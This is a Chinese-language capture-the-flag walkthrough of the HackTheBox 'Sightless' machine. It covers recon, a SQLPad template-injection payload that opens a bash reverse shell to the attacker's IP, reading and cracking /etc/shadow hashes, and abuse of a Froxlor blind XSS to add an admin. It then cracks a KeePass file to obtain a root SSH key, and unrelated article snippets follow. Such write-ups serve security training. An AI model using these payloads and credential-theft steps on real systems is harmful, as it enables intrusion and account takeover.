HackTheBox靶机:Sightless;NodeJS模板注入漏洞,盲XSS跨站脚本攻击漏洞实战

HackTheBox靶机:Sightless

    • 渗透过程
      • 1. 信息收集
        • 常规探测
        • 深入分析
      • 2. 漏洞利用(CVE-2022-0944)
      • 3. 从Docker中提权
      • 4. 信息收集(michael用户)
      • 5. 漏洞利用 Froxlor
      • 6. 解密Keepass文件
    • 漏洞分析
      • SQLPad CVE-2022-0944

靶机介绍
Sightless 是一台难度较低的 Linux 机器,包含一个为公司提供各种服务的网页。对该网页的枚举发现了一个含模板注入漏洞 CVE-2022-0944 的SQLPad实例,利用该漏洞成功进入 Docker 容器。进一步枚举发现 /etc/shadow 文件,其中包含一个密码哈希,经过破解得到密码,从而获得了主机的 SSH 访问权限。在后续的攻击过程中,枚举发现一个受盲目 XSS 漏洞 CVE-2024-34070影响的 Froxlor 实例。利用该漏洞攻击成功后,获取了 FTP 服务的访问权限,该服务包含一个 KeePass 数据库。访问数据库后,发现了 root 用户的 SSH 密钥,从而获得了主机的特权 shell 权限。

相关漏洞

  • 模板注入 CVE-2022-0944
  • XSS 漏洞 CVE-2024-34070

渗透过程

1. 信息收集

常规探测

探测开放端口

nmap -p- --min-rate 10000 10.10.11.32 
...
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-08 14:51 EDT 
Nmap scan report for 10.10.11.32 Host is up (0.023s latency). 
Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 
21/tcp open ftp 
22/tcp open ssh 
80/tcp open http

服务详细信息探测

nmap -p 21,22,80 -sCV 10.10.11.32
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-08 14:54 EDT
Nmap scan report for 10.10.11.32
Host is up (0.024s latency).PORT   STATE SERVICE VERSION
21/tcp open  ftp
| fingerprint-strings:
|   GenericLines:
|     220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32]
|     Invalid command: try being more creative
|_    Invalid command: try being more creative
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 c9:6e:3b:8f:c6:03:29:05:e5:a0:ca:00:90:c9:5c:52 (ECDSA)
|_  256 9b:de:3a:27:77:3b:1b:e1:19:5f:16:11:be:70:e0:56 (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://sightless.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port21-TCP:V=7.94SVN%I=7%D=9/8%Time=66DDF2FD%P=x86_64-pc-linux-gnu%r(Ge
SF:nericLines,A0,"220\x20ProFTPD\x20Server\x20\(sightless\.htb\x20FTP\x20S
SF:erver\)\x20\[::ffff:10\.10\.11\.32\]\r\n500\x20Invalid\x20command:\x20t
SF:ry\x20being\x20more\x20creative\r\n500\x20Invalid\x20command:\x20try\x2
SF:0being\x20more\x20creative\r\n");
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

通过nmap的扫描我们可以知道此目标开放了FTP,SSH,Web(http)三个服务,而web的域名是http://sightless.htb/,因此需要配置host文件:

echo '10.10.11.32 sightless.htb' > /etc/hosts
深入分析

FTP服务

ftp sightless.htb 
...
Trying 10.10.11.32:21 ... 
Connected to sightless.htb. 
220 ProFTPD Server (sightless.htb FTP Server) [::ffff:10.10.11.32] 
Name (sightless.htb:oxdf): anonymous 
550 SSL/TLS required on the control channel 
ftp: Login failed

尝试链接后发现需要SSL/TLS,可以通过FileZilla(Linux)来进行连接,我们先将这个放到后面去考虑,因为我们现在没有密码。

Web服务
访问网站首页:
在这里插入图片描述
在经历基本的浏览后,我们可以发现在首页的地方有一处域名的跳转,其域名指向sqlpad.sightless.htb: 在这里插入图片描述

echo '10.10.11.32 sqlpad.sightless.htb' > /etc/hosts

访问后发现其是一个名为sqlpad的后台。
在这里插入图片描述

2. 漏洞利用(CVE-2022-0944)

在此页面浏览发现其版本为:6.10.0
在这里插入图片描述
确定了版本后尝试搜索网络公开的威胁情报,查看是否有公开的RCE漏洞。
在这里插入图片描述
这里可以确定在SQLPad中确实存在RCE漏洞,其漏洞编号为 CVE-2022-0944,通过公开的信息了解到在连接时,可以注入Payload,执行命令。

在这里插入图片描述

  • 点击连接->添加连接
  • 选择MySQL作为驱动程序
  • 在数据库表单字段中输入以下有效负载
  • 执行以下命令确认/tmp/pwn 文件已在容器文件系统中创建

这里我们简单的改造一下Payload来反弹一个bash shell:

{{ process.mainModule.require('child_process').exec('bash -c "bash -i >& /dev/tcp/10.10.14.10/443 0>&1"') }}

在这里插入图片描述

nc -lnvp 443 
Listening on 0.0.0.0 443 
Connection received on 10.10.11.32 49336 
bash: cannot set terminal process group (1): Inappropriate ioctl for device 
bash: no job control in this shell 
root@c184118df0a6:/var/lib/sqlpad

我们成功获取了一个立足点。

3. 从Docker中提权

初步的信息收集:

root@c184118df0a6:/ ls -a 
. bin docker-entrypoint lib mnt root srv usr 
.. boot etc lib64 opt run sys var 
.dockerenv dev home media proc sbin tmp

通过这里的信息:docker-entrypoint 我们可以基本判断我们处在Docker内。

root@c184118df0a6:/home$ cat /etc/passwd | grep "sh$" 
root:x:0:0:root:/root:/bin/bash 
node:x:1000:1000::/home/node:/bin/bash 
michael:x:1001:1001::/home/michael:/bin/bash

可以发现,这里三个用户已设置 shell ,作为 root 用户我们可以获取其 /etc/passwd,来通过hashcat枚举获取用户密码。

root@c184118df0a6:/home# cat /etc/shadow | grep '\$' 
root:$6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:19858:0:99999:7::: 
michael:$6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:19860:0:99999:7:::
hashcat hashes ~/SecLists/Passwords/Leaked-Databases/rockyou.txt --user

将其保存为文件hashes,使用hashcat工具穷举密码,等待后成功穷举出密码

$ hashcat hashes /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt --user hashcat (v6.2.6) starting in autodetect mode ...[snip]... Hash-mode was not specified with -m. Attempting to auto-detect hash mode. The following mode was auto-detected as the only one matching your input hash: 1800 | sha512crypt $6$, SHA512 (Unix) | Operating System ...[snip]... $6$jn8fwk6LVJ9IYw30$qwtrfWTITUro8fEJbReUc7nXyx2wwJsnYdZYm9nMQDHP8SYm33uisO9gZ20LGaepC3ch6Bb2z/lEpBM90Ra4b.:blindside $6$mG3Cp2VPGY.FDE8u$KVWVIHzqTzhOSYkzJIpFc2EsgmqvPa.q2Z9bLUU6tlBWaEwuxCDEP9UFHIXNUcF2rBnsaFYuJa6DUh/pL2IJD/:insaneclownposse ...[snip]... Started: Sun Sep 8 22:00:54 2024 Stopped: Sun Sep 8 22:01:00 2024

michael用户的密码是insaneclownposse;其root用户的密码是blindside;尝试使用两个已知的用户和密码登录SSH。使用交叉的方式组合密码和用户名尝试登陆:

sshpass -p 'blindside' ssh root@10.10.11.32
sshpass -p 'blindside' ssh michael@10.10.11.32
sshpass -p 'insaneclownposse' ssh root@10.10.11.32
sshpass -p 'insaneclownposse' ssh root@10.10.11.32
Fly@Kali$ sshpass -p 'insaneclownposse' ssh root@10.10.11.32
Warning: Permanently added 'sightless.htb' (ED25519) to the list of known hosts.
Last login: Tue Sep 3 11:52:02 2024 from 10.11.14.23 
michael@sightless:~$
michael@sightless:~$ cat user.txt 
cb7db915************************

4. 信息收集(michael用户)

我们已经成功登录michael 用户,我们开始继续信息收集,查看是否有运维脚本:

michael@sightless:~$ sudo -l 
[sudo] password for michael: 
Sorry, user michael may not run sudo on sightless.

查看当前目录:

michael@sightless:~$ ls -la 
total 28 
drwxr-x--- 3 michael michael 4096 Jul 31 13:15 . 
drwxr-xr-x 4 root root 4096 May 15 19:03 .. 
lrwxrwxrwx 1 root root 9 May 21 18:49 .bash_history -> /dev/null 
-rw-r--r-- 1 michael michael 220 Jan 6 2022 .bash_logout 
-rw-r--r-- 1 michael michael 3771 Jan 6 2022 .bashrc 
-rw-r--r-- 1 michael michael 807 Jan 6 2022 .profile 
drwx------ 2 michael michael 4096 May 15 03:43 .ssh 
-rw-r----- 1 root michael 33 May 16 00:16 user.txt

查看其他用户:

michael@sightless:/home$ ls 
john michael 
michael@sightless:/home$ ls john/ 
ls: cannot open directory 'john/': Permission denied

查看网络情况

在这里插入图片描述

可以发现目标机器开启了8080端口,我们通过端口转发后尝试访问。

ssh michael@sightless.htb -L 8081:127.0.0.1:8080

浏览器访问:127.0.0.1:8081

在这里插入图片描述

5. 漏洞利用 Froxlor

通过搜索公开情报,使用Froxlor CVE 搜索到了 CVE-2024-34070

Froxlor 是一款开源服务器管理软件。在 ​​2.1.9 之前,Froxlor 应用程序的失败登录尝试日志记录功能中发现了一个存储盲跨站点脚本 (XSS) 漏洞。未经身份验证的用户可以在登录尝试时在 loginname 参数中注入恶意脚本,然后当管理员在系统日志中查看时,该脚本将被执行。通过利用此漏洞,攻击者可以执行各种恶意操作,例如在管理员不知情或未经同意的情况下强迫管理员执行操作。例如,攻击者可以强迫管理员添加由攻击者控制的新管理员,从而​​使攻击者完全控制应用程序。

通过阅读其漏洞信息开始利用:

在这里插入图片描述

在首页登录后使用BurpSuite拦截

![[Pasted image 20250122173734.png]]

loginname 的值替换为Payload,替换前需要修改其提供的Payload(目标要改为http://admin.sightless.htb:8080/admin_admins.php)先将其url解码,修改后再进行编码。

在这里插入图片描述

修改后发送请求:

![[Pasted image 20250122174407.png]]

使用Payload中设置的账号密码登录

![[Pasted image 20250122174637.png]]

找到FTP服务并修改密码

![[Pasted image 20250122174704.png]]

使用FileZilla登录FTP

![[Pasted image 20250122174758.png]]

6. 解密Keepass文件

通过keepass2john提取keepass的hash,并使用hashcat枚举密码:

keepass2john Database.kdb > Database.kdb.hash
hashcat Database.kdb.hash ~/SecLists/Passwords/Leaked-Databases/rockyou.txt --user

枚举后获取密码为:bulldogs ,使用kpcli连接数据库:

kpcli --kdb Database.kdb
Provide the master password: ************************* 
KeePass CLI (kpcli) v3.8.1 is ready for operation. 
Type 'help' for a description of available commands. 
Type 'help <command>' for details on individual commands.
kpcli:/> ls 
=== Groups === 
General/ 

探索kdb:

kpcli:/> ls General/ 
=== Groups ===
eMail/ 
Homebanking/ 
Internet/ 
Network/ 
sightless.htb/ 
Windows/
kpcli:/> ls General/* 
/General/eMail:/General/Homebanking: /General/Internet: /General/Network: /General/sightless.htb: 
=== Groups === 
Backup/ /General/Windows:kpcli:/> ls General/sightless.htb/Backup/ 
=== Entries === 
0. ssh

查看ssh文件的内容:

kpcli:/> show -f General/sightless.htb/Backup/ssh 
Path: /General/sightless.htb/Backup/ 
Title: ssh 
Uname: root 
Pass: q6gnLTB74L132TMdFCpK 
URL: 
Notes: 
Atchm: id_rsa (3428 bytes)

有一个密码和一个附件。attach将打开一个菜单来下载它:

kpcli:/> attach General/sightless.htb/Backup/ssh 
Atchm: id_rsa (3428 bytes) 
Choose: (a)dd/(e)xport/(d)elete/(c)ancel/(F)inish? 
Path to file: /root/htb/sightless/id_rsa
Saved to: /root/htb/sightless/id_rsa 
Atchm: id_rsa (3428 bytes)

使用其登录SSH

因为下载的文件换行符有格式问题,会报错:error in libcrypto,需要修改其格式

登录root

ssh -i ~/htb/sightless/id_rsa root@10.10.11.32 
Last login: Tue Sep 10 01:44:34 2024 from 10.10.14.6 
root@sightless:~& cat root.txt 
22467**********************

漏洞分析

SQLPad CVE-2022-0944

SQLPad 是一款开源 SQL 查询编辑器,在 ​​6.10.1 之前,该漏洞存在于 SQLPad 的 render-connection.js 通过在传输参数中插入恶意代码,攻击者能够注入代码进行命令执行。

源码分析
根据漏洞披露的情报,可以定位到 render-connection.js ,具体的代码如下:

// # server\lib\render-connection.js
function renderConnection(connection, user) {const replaced = {};Object.keys(connection).forEach((key) => {if (key === 'data') {const value = renderConnection(connection.data, user);connection.data = value;} else {const value = connection[key];if (typeof value === 'string') {//设置模板的插值符号 {{ ... }},而不是默认的 <%= ... %>_.templateSettings.interpolate = /{{([\s\S]+?)}}/g;// 编译模板并替换占位符const compiled = _.template(value);replaced[key] = compiled({ user });} else {replaced[key] = value;}}});return replaced;
}

通过分析可以得知,这里的模板内容,获取了请求中的数据后,并没有进行清理和过滤,从而导致了模板注入漏洞。下面写一个简单的例子来复现这个代码

const _ = require('lodash');
const user = {name: 'Alice'};
// 设置模板的插值符号 {{ ... }},而不是默认的 <%= ... %>
_.templateSettings.interpolate = /{{([\s\S]+?)}}/g;
// 用户输入的模板内容
// 在这种情况下,用户可以注入恶意代码,执行打开计算器。
const value = "{{ process.mainModule.require('child_process').exec('calc') }}";
// 编译模板并替换占位符
const compiled = _.template(value);
compiled({ user });

当运行这个示例脚本时编译时会触发命令执行,并打开计算器。

在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/69137.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Ansible入门学习之基础元素介绍

一、Ansible目录结构介绍 1.通过rpm -ql ansible获取ansible所有文件存放的目录 有配置文件目录 /etc/ansible/ 执行文件目录 /usr/bin/ 其中 /etc/ansible/ 该文件目录的主要功能是 inventory主机信息配置&#xff0c;ansible工具功能配置。 ansible自身的配置文件…

【pytorch 】miniconda python3.11 环境安装pytorch

ubuntu24.04 miniconda python3.11 环境安装pytorch 组件:langgraph本身不需要有一些模型是需要的:python3.11环境:报错ModuleNotFoundError: No module named ‘torchaudio’ ModuleNotFoundError: No module named ‘torchaudio’File "/root/miniconda3/envs/05_ep_…

Antd React Form使用Radio嵌套多个Select和Input的处理

使用Antd React Form使用Radio会遇到嵌套多个Select和Input的处理&#xff0c;需要多层嵌套和处理默认事件和冒泡&#xff0c;具体实现过程直接上代码。 实现效果布局如下图 代码 <Formname"basic"form{form}labelWrap{...formItemLayoutSpan(5, 19)}onFinish{on…

11 蚂蚁链技术特性

概览 蚂蚁链通过引入P2P网络、共识算法、虚拟机、智能合约、密码学、数据存储等技术特性&#xff0c;构建一个稳定、高效、安全的图灵完备智能合约执行环境&#xff0c;提供账户的基本操作以及面向智能合约的功能调用。 区块结构 一个区块包含区块头和区块体&#xff0c;区块…

如何使用 pytest-html 创建自定义 HTML 测试报告

关注开源优测不迷路 大数据测试过程、策略及挑战 测试框架原理&#xff0c;构建成功的基石 在自动化测试工作之前&#xff0c;你应该知道的10条建议 在自动化测试中&#xff0c;重要的不是工具 测试 Python 代码对于提高代码质量、检测漏洞或意外行为至关重要。 但测试结果又该…

【华为OD-E卷 - VLAN资源池 100分(python、java、c++、js、c)】

【华为OD-E卷 - VLAN资源池 100分&#xff08;python、java、c、js、c&#xff09;】 题目 VLAN是一种对局域网设备进行逻辑划分的技术&#xff0c;为了标识不同的VLAN&#xff0c;引入VLAN ID(1-4094之间的整数)的概念。 定义一个VLAN ID的资源池(下称VLAN资源池)&#xff0…

【C++高并发服务器WebServer】-5:内存映射与进程通信

本文目录 一、内存映射与进程通信二、匿名映射与进程通信 一、内存映射与进程通信 内存映射Memory-mapped I/O指的是将磁盘文件的数据映射到内存&#xff0c;用户通过修改内存就能够修改磁盘文件&#xff0c;如下图所示&#xff08;进程地址空间指的是虚拟地址空间&#xff09…

使用vscode + Roo Code (prev. Roo Cline)+DeepSeek-R1使用一句话需求做了个实验

摘要 使用vscode、Roo Code和deepseek-reasoner进行了一个实验&#xff0c;尝试使用一句话需求来生成小红书封面图片。工具根据需求提供了详细的架构方案&#xff0c;包括技术栈选择、核心模块划分、目录结构建议等。然后&#xff0c;工具自动化地完成了开发和测试&#xff0c;…

C语言初阶牛客网刷题—— JZ11 旋转数组的最小数字【难度:简单】

1. 题目描述 牛客网在线OJ链接 有一个长度为 n 的非降序数组&#xff0c;比如 [1,2,3,4,5] &#xff0c;将它进行旋转&#xff0c;即把一个数组最开始的若干个元素搬到数组的末尾&#xff0c;变成一个旋转数组&#xff0c;比如变成了 [3,4,5,1,2] &#xff0c;或者 [4,5,1,2,3…

Coze,Dify,FastGPT,对比

在当今 AI 技术迅速发展的背景下&#xff0c;AI Agent 智能体成为了关键领域&#xff0c;Coze、Dify 和 FastGPT 作为其中的佼佼者&#xff0c;各有千秋。 平台介绍 - FastGPT&#xff1a;由环界云计算公司发起&#xff0c;是基于大语言模型&#xff08;LLM&#xff09;的开源…

如何解压7z文件?8种方法(Win/Mac/手机/网页端)

7z 文件是一种高效的压缩文件格式&#xff0c;由 7 - Zip 软件开发者所采用。它运用独特的压缩算法&#xff0c;能显著缩小文件体积&#xff0c;便于存储与传输各类数据&#xff0c;像软件安装包、大型资料集等。但要使用其中内容&#xff0c;就必须解压&#xff0c;因为处于压…

【Docker】ubuntu中 Docker的使用

之前记录了 docker的安装 【环境配置】ubuntu中 Docker的安装&#xff1b; 本篇博客记录Dockerfile的示例&#xff0c;docker 的使用&#xff0c;包括镜像的构建、容器的启动、docker compose的使用等。   当安装好后&#xff0c;可查看docker的基本信息 docker info ## 查…

豆包MarsCode 蛇年编程大作战 | 高效开发“蛇年运势预测系统”

&#x1f31f; 嗨&#xff0c;我是LucianaiB&#xff01; &#x1f30d; 总有人间一两风&#xff0c;填我十万八千梦。 &#x1f680; 路漫漫其修远兮&#xff0c;吾将上下而求索。 豆包MarsCode 蛇年编程大作战 | &#x1f40d; 蛇年运势预测 在线体验地址&#xff1a;蛇年…

【转帖】eclipse-24-09版本后,怎么还原原来版本的搜索功能

【1】原贴地址&#xff1a;eclipse - 怎么还原原来版本的搜索功能_eclipse打开类型搜索类功能失效-CSDN博客 https://blog.csdn.net/sinat_32238399/article/details/145113105 【2】原文如下&#xff1a; 更新eclipse-24-09版本后之后&#xff0c;新的搜索功能&#xff08;CT…

求平均年龄(信息学奥赛一本通-1059)

【题目描述】 班上有学生若干名&#xff0c;给出每名学生的年龄&#xff08;整数&#xff09;&#xff0c;求班上所有学生的平均年龄&#xff0c;保留到小数点后两位。 【输入】 第一行有一个整数n&#xff08;1≤n≤100&#xff09;&#xff0c;表示学生的人数。其后n行每行有…

macos的图标过大,这是因为有自己的设计规范

苹果官方链接&#xff1a;App 图标 | Apple Developer Documentation 这个在官方文档里有说明&#xff0c;并且提供了sketch 和 ps 的模板。 figma还提供了模板&#xff1a; Figma

C++ —— 智能指针 unique_ptr (上)

C —— 智能指针 unique_ptr &#xff08;上&#xff09; 普通指针的不足普通指针的释放智能指针智能指针 unique_ptr智能指针初始化错误用法get()方法返回裸指针智能指针不支持指针的运算&#xff08;、-、、- -&#xff09; 普通指针的不足 new和new [] 的内存需要用delete和…

C++异步future

&#x1f30e; C11异步futrue 文章目录&#xff1a; C11异步futrue future介绍     应用场景     future操作       std::async函数模版       std::packaged_task类模版       std::promise类模版 &#x1f680;future介绍 std::future是C11标准库…

# AI绘图中的Embedding、CLIP、Flux中的Clip与LCM SDXL加速生成解析

AI绘图中的Embedding、CLIP、Flux中的Clip与LCM SDXL加速生成解析 在现代AI绘图和深度学习中&#xff0c;涉及了多个复杂的概念和技术&#xff0c;这些技术在图像生成、训练加速以及多模态学习等方面起着至关重要的作用。在这篇博客中&#xff0c;我们将讨论几个关键概念&…

linux下jsoncpp编译

折腾了一顿&#xff0c;我使用ubuntu16.04编译的jsoncpp&#xff0c;由于使用的芯片工程需要16.04&#xff0c;无法使用最新的ubuntu系统。 发现jsoncpp编译时&#xff0c; CMake Error: Could not find CMAKE_ROOT !!! CMake has most likely not been installed correctly. …